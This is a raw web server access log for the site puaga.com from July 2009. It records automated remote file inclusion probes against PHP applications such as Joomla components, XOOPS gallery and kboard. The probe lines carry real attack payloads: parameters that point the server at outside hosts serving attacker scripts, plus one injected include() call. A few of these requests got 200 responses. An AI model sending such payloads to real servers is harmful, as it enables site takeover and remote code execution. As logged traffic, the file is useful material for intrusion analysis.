62.128.135.52 - - [05/Jul/2009:07:00:57 -0700] "GET /index2.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
216.120.237.150 - - [05/Jul/2009:07:01:25 -0700] "GET /index2.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.811" "www.puaga.com"
70.87.217.26 - - [05/Jul/2009:07:01:32 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.87.217.26 - - [05/Jul/2009:07:01:32 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.87.217.26 - - [05/Jul/2009:07:01:32 -0700] "GET /logs/access_090612.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.87.217.26 - - [05/Jul/2009:07:01:37 -0700] "GET /logs/access_090616.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.120.237.150 - - [05/Jul/2009:07:01:59 -0700] "GET /logs/access_090529.log//index2.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.811" "www.puaga.com"
216.120.237.150 - - [05/Jul/2009:07:01:59 -0700] "GET /index2.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.811" "www.puaga.com"
216.120.237.150 - - [05/Jul/2009:07:01:59 -0700] "GET /logs//index2.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.811" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:07:02:10 -0700] "GET /logs/access_090605.log/addevent.inc.php?agendax_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:07:02:10 -0700] "GET /logs/addevent.inc.php?agendax_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:07:02:10 -0700] "GET /addevent.inc.php?agendax_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
65.98.59.178 - - [05/Jul/2009:07:02:49 -0700] "GET /logs/access_090530.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.scd-lunjina.org//poll/idsnk.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.811" "www.puaga.com"
65.98.59.178 - - [05/Jul/2009:07:02:49 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.scd-lunjina.org//poll/idsnk.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.811" "www.puaga.com"
65.98.59.178 - - [05/Jul/2009:07:02:49 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.scd-lunjina.org//poll/idsnk.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.811" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:02:53 -0700] "GET /logs/access_090530.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:07:02:56 -0700] "GET /logs/access_090616.log/addevent.inc.php?agendax_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:03:03 -0700] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.98.59.178 - - [05/Jul/2009:07:03:10 -0700] "GET /logs/access_090510.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.scd-lunjina.org//poll/idsnk.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.811" "www.puaga.com"
70.87.217.26 - - [05/Jul/2009:07:03:11 -0700] "GET /logs/access_090612.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.87.217.26 - - [05/Jul/2009:07:03:18 -0700] "GET /logs/access_090616.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.87.217.26 - - [05/Jul/2009:07:03:24 -0700] "GET /logs/access_090612.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.87.217.26 - - [05/Jul/2009:07:03:24 -0700] "GET /logs/access_090616.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.128.135.52 - - [05/Jul/2009:07:04:03 -0700] "GET /logs/access_090529.log//index2.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
62.128.135.52 - - [05/Jul/2009:07:04:03 -0700] "GET /index2.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
62.128.135.52 - - [05/Jul/2009:07:04:03 -0700] "GET /logs//index2.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:04:13 -0700] "GET /logs/access_090530.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:04:13 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:04:13 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:07:04:32 -0700] "GET /logs/include.php?path%5Bdocroot%5D=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:07:04:35 -0700] "GET /logs/access_090519.log/include.php?path%5Bdocroot%5D=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:07:04:35 -0700] "GET /include.php?path%5Bdocroot%5D=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:07:04:42 -0700] "GET /logs/access_090528.log/include.php?path%5Bdocroot%5D=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:05:41 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:05:46 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:05:46 -0700] "GET /logs/access_090524.log//classes/adodbt/sql.php?classes_dir=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:05:46 -0700] "GET /classes/adodbt/sql.php?classes_dir=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:05:56 -0700] "GET /logs/access_090524.log//classes/adodbt/sql.php?classes_dir=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:05:56 -0700] "GET /classes/adodbt/sql.php?classes_dir=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.puaga.com"
65.98.59.178 - - [05/Jul/2009:07:06:17 -0700] "GET /logs/access_090524.log%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.scd-lunjina.org//poll/idsnk.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.811" "www.puaga.com"
65.98.59.178 - - [05/Jul/2009:07:06:17 -0700] "GET /logs/access_090612.log%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.scd-lunjina.org//poll/idsnk.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.811" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:06:40 -0700] "GET /logs/access_090615.log//classes/adodbt/sql.php?classes_dir=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:07:36 -0700] "GET /classes/adodbt/sql.php?classes_dir=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
218.38.243.71 - - [05/Jul/2009:07:07:55 -0700] "GET /logs//?_zb_path=http://samhwagolf.com/zb41//latest_skin/default/default_lib/1.txt???? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.71 - - [05/Jul/2009:07:07:56 -0700] "GET /logs/access_090628.log//?_zb_path=http://samhwagolf.com/zb41//latest_skin/default/default_lib/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:08:38 -0700] "GET /logs/access_090626.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.19.3.66 - - [05/Jul/2009:07:09:32 -0700] "GET /logs/access_090523.log/index.php?sayfa=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
89.19.3.66 - - [05/Jul/2009:07:09:32 -0700] "GET /logs/index.php?sayfa=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
89.19.3.66 - - [05/Jul/2009:07:09:33 -0700] "GET /index.php?sayfa=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 200 6125 "-" "libwww-perl/5.810" "www.puaga.com"
89.19.3.66 - - [05/Jul/2009:07:09:59 -0700] "GET /logs/access_090524.log/index.php?sayfa=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:10:15 -0700] "GET /logs/access_090616.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:10:16 -0700] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.puaga.com"
122.214.48.150 - - [05/Jul/2009:07:10:16 -0700] "GET /logs/access_090523.log/index.php?sayfa=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
122.214.48.150 - - [05/Jul/2009:07:10:17 -0700] "GET /logs/index.php?sayfa=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
122.214.48.150 - - [05/Jul/2009:07:10:17 -0700] "GET /index.php?sayfa=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 200 6125 "-" "libwww-perl/5.79" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:10:28 -0700] "GET /logs/access_090611.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.puaga.com"
122.214.48.150 - - [05/Jul/2009:07:10:36 -0700] "GET /logs/access_090524.log/index.php?sayfa=http://unitarstudents.com/portal/cmss/yes.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:11:07 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:11:07 -0700] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:11:07 -0700] "GET /logs/access_090616.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:11:09 -0700] "GET /logs/access_090611.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:11:21 -0700] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:11:21 -0700] "GET /logs/access_090616.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:11:22 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:11:23 -0700] "GET /logs/access_090611.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.80.195.55 - - [05/Jul/2009:07:12:16 -0700] "GET / HTTP/1.0" 200 6109 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; yie6_SBC; YPC 3.2.0; FunWebProducts; (R1 1.5; yplus 5.1.02b); .NET CLR 1.1.4322)" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:12:20 -0700] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
82.194.87.219 - - [05/Jul/2009:07:12:29 -0700] "GET /logs///common/db.php?commonpath=http://www.animeforum.com/impex/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.822" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:07:12:39 -0700] "GET /logs/access_090612.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:07:12:39 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:07:12:39 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:07:12:45 -0700] "GET /logs/access_090614.log/header.php?base_folder=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:07:12:45 -0700] "GET /header.php?base_folder=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:07:12:45 -0700] "GET /logs/header.php?base_folder=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:07:13:12 -0700] "GET /logs/access_090616.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:07:13:33 -0700] "GET /logs/access_090619.log//kboard/kboard.php?board=notice&act=v...h_mode=&search_word=&cid=//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.sanri.org/HCboard/data/id.txt%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:07:13:33 -0700] "GET /kboard/kboard.php?board=notice&act=v...h_mode=&search_word=&cid=//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.sanri.org/HCboard/data/id.txt%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:07:13:33 -0700] "GET /logs//kboard/kboard.php?board=notice&act=v...h_mode=&search_word=&cid=//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.sanri.org/HCboard/data/id.txt%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:13:35 -0700] "GET /logs/access_090529.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:13:35 -0700] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:13:35 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:07:13:37 -0700] "GET /logs/access_090519.log/header.php?base_folder=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:07:13:38 -0700] "GET /logs/access.log//kboard/kboard.php?board=notice&act=v...h_mode=&search_word=&cid=//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.sanri.org/HCboard/data/id.txt%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:07:13:44 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:07:13:44 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:07:13:45 -0700] "GET /logs/access_090523.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.68.28 - - [05/Jul/2009:07:14:02 -0700] "GET /kboard/kboard.php?board=notice&act=v...h_mode=&search_word=&cid=//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.sanri.org/HCboard/data/id.txt%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
89.145.68.28 - - [05/Jul/2009:07:14:02 -0700] "GET /logs//kboard/kboard.php?board=notice&act=v...h_mode=&search_word=&cid=//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.sanri.org/HCboard/data/id.txt%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
89.145.68.28 - - [05/Jul/2009:07:14:02 -0700] "GET /logs/access_090619.log//kboard/kboard.php?board=notice&act=v...h_mode=&search_word=&cid=//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.sanri.org/HCboard/data/id.txt%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:07:14:08 -0700] "GET /logs/access_090610.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.68.28 - - [05/Jul/2009:07:14:16 -0700] "GET /logs/access.log//kboard/kboard.php?board=notice&act=v...h_mode=&search_word=&cid=//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.sanri.org/HCboard/data/id.txt%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:07:15:17 -0700] "GET /logs/access_090523.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:07:15:18 -0700] "GET /logs/access_090610.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:15:51 -0700] "GET /logs/access_090616.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
80.67.25.1 - - [05/Jul/2009:07:16:59 -0700] "GET /logs/access_090611.log/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.67.25.1 - - [05/Jul/2009:07:17:08 -0700] "GET /logs/access_090611.log/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:17:12 -0700] "GET /logs/access_090524.log%20%20//classes/adodbt/sql.php?classes_dir=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.30.87.93 - - [05/Jul/2009:07:17:37 -0700] "GET /logs/access_090609.log HTTP/1.0" 200 1527482 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:17:37 -0700] "GET /logs/access_090513.log%20%20//classes/adodbt/sql.php?classes_dir=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.68.28 - - [05/Jul/2009:07:17:47 -0700] "GET /logs/access.log%20//kboard/kboard.php?board=notice&act=v...h_mode=&search_word=&cid=//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.sanri.org/HCboard/data/id.txt%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
89.223.3.98 - - [05/Jul/2009:07:18:05 -0700] "GET /logs/access_090609.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.223.3.98 - - [05/Jul/2009:07:18:05 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.223.3.98 - - [05/Jul/2009:07:18:05 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:18:07 -0700] "GET /logs/access_090529.log%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:18:16 -0700] "GET /logs/access_090529.log%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:18:22 -0700] "GET /logs/access_090616.log%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:18:25 -0700] "GET /logs/access_090524.log//classes/adodbt/sql.php?classes_dir=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:18:25 -0700] "GET /classes/adodbt/sql.php?classes_dir=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:18:25 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:18:25 -0700] "GET /logs/access_090616.log%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.223.3.98 - - [05/Jul/2009:07:18:40 -0700] "GET /logs/access_090610.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
